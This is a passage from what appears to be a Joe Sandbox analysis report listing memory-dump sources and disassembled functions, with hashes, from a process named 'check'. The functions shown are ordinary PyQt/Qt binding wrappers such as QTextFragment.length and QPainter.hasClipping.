                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?length@Fragment@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextFragment$length$length(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3894585651-2905367999
                                                                                                                                                                                                                                          • Opcode ID: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                                          • Instruction ID: 53ab71a4de48aaa46e49e38a2f28609fc29e5e5e30992a64d5bc64089fa567e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da8f611d82748ebdea820eec21723de1dd46223c9bbf2bc53f9221ccc5ced96f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50011A36A08A46C2EB109F60E8496A933A8FB84FD4F914032C98E43324EF7DE55AC344
                                                                                                                                                                                                                                          Function 00007FF89D989EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?weight@Font@@FromLongLong_
                                                                                                                                                                                                                                          • String ID: QRawFont$weight$weight(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1495005862-2304509088
                                                                                                                                                                                                                                          • Opcode ID: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                                          • Instruction ID: a9f2ab38275313fd0a070cde5d1a11c3e7b3f54915a3e21116e337d59d834aa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7011E76A08B46D1EB109F61E84A6A933E4FB44F90F918032CA9E43324EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D95BAB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textFromInlineLongLong_Object@@Position@Text
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$textPosition$textPosition(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2776140407-124157796
                                                                                                                                                                                                                                          • Opcode ID: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                                          • Instruction ID: 3aaf78f0a5994741f4a052f80a1db0cfa684f9634b47b978b7485d8785b38b7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69011A36A08B46C1EB109F61E84A6A933A4FB84F94F914032C99E43334EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D979EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongNull@Vector4
                                                                                                                                                                                                                                          • String ID: QVector4D$isNull$isNull(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3909539051-2332985828
                                                                                                                                                                                                                                          • Opcode ID: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                                          • Instruction ID: 243de5c4058c47ae5130ab3750b4f3f132def9effcb116fb1370ac4d396e98db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6012C36A08A46D1EB109F61E8896A933E4FB44FD4F914032D99E47320EF7CE56AC744
                                                                                                                                                                                                                                          Function 00007FF89D969A90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$cellPadding$cellPadding(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-1600723810
                                                                                                                                                                                                                                          • Opcode ID: 13362e5ba8ec5c8722dfbb3e568b380f4f3d56dd7ef5db2fdcf47792cd819d56
                                                                                                                                                                                                                                          • Instruction ID: edd8f1acc7a8d8e85adf4c4ad3101f68b1069a6fc2c779e590b4ab6f9062d7dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13362e5ba8ec5c8722dfbb3e568b380f4f3d56dd7ef5db2fdcf47792cd819d56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA011E37A08A46D5EB109F51E8896A933E4FB44FD4F914032DA9E03324EF7CE69AC344
                                                                                                                                                                                                                                          Function 00007FF89D997EE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?hasBool_Clipping@FromLongPainter@@
                                                                                                                                                                                                                                          • String ID: QPainter$hasClipping$hasClipping(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2826564307-3272688965
                                                                                                                                                                                                                                          • Opcode ID: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                                          • Instruction ID: b97d1129a8456a75009cffcc76286117d66e7b989e0e2d1b8910f3fe21719b05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012C36A08B46C1EB109F11E8996A933E4FB44F90F914032D99E43320EF7CE569C384
                                                                                                                                                                                                                                          Function 00007FF89D955AE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?lineCount@Document@@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$lineCount$lineCount(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3258379902-1896213649
                                                                                                                                                                                                                                          • Opcode ID: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                                          • Instruction ID: 5a0be12d057cb2eee1d52bbdac2fbb8413d64e028c7a224d9712ad59da6d68b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e412bc7ef241f319fc6e820cfbf1fcc817a01528f3604dacdac3ffc2ba983e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7012C37A08A46C1EB109F61E8496A933E4FB44FD0F914032DA8E47324EF7DE55AC388
                                                                                                                                                                                                                                          Function 00007FF89D997A20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?showBool_FromFullHints@@LongScreen@Style
                                                                                                                                                                                                                                          • String ID: QStyleHints$showIsFullScreen$showIsFullScreen(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 854758034-4144901577
                                                                                                                                                                                                                                          • Opcode ID: a29b20e0a43de06acdb7bd249bfc9ce62130d5d90824c6d40dc7d9a297fb3508
                                                                                                                                                                                                                                          • Instruction ID: 47e5520bcae22a2eadde44c7f0d9a172fd30dcb0090733820be42c995432ebfb
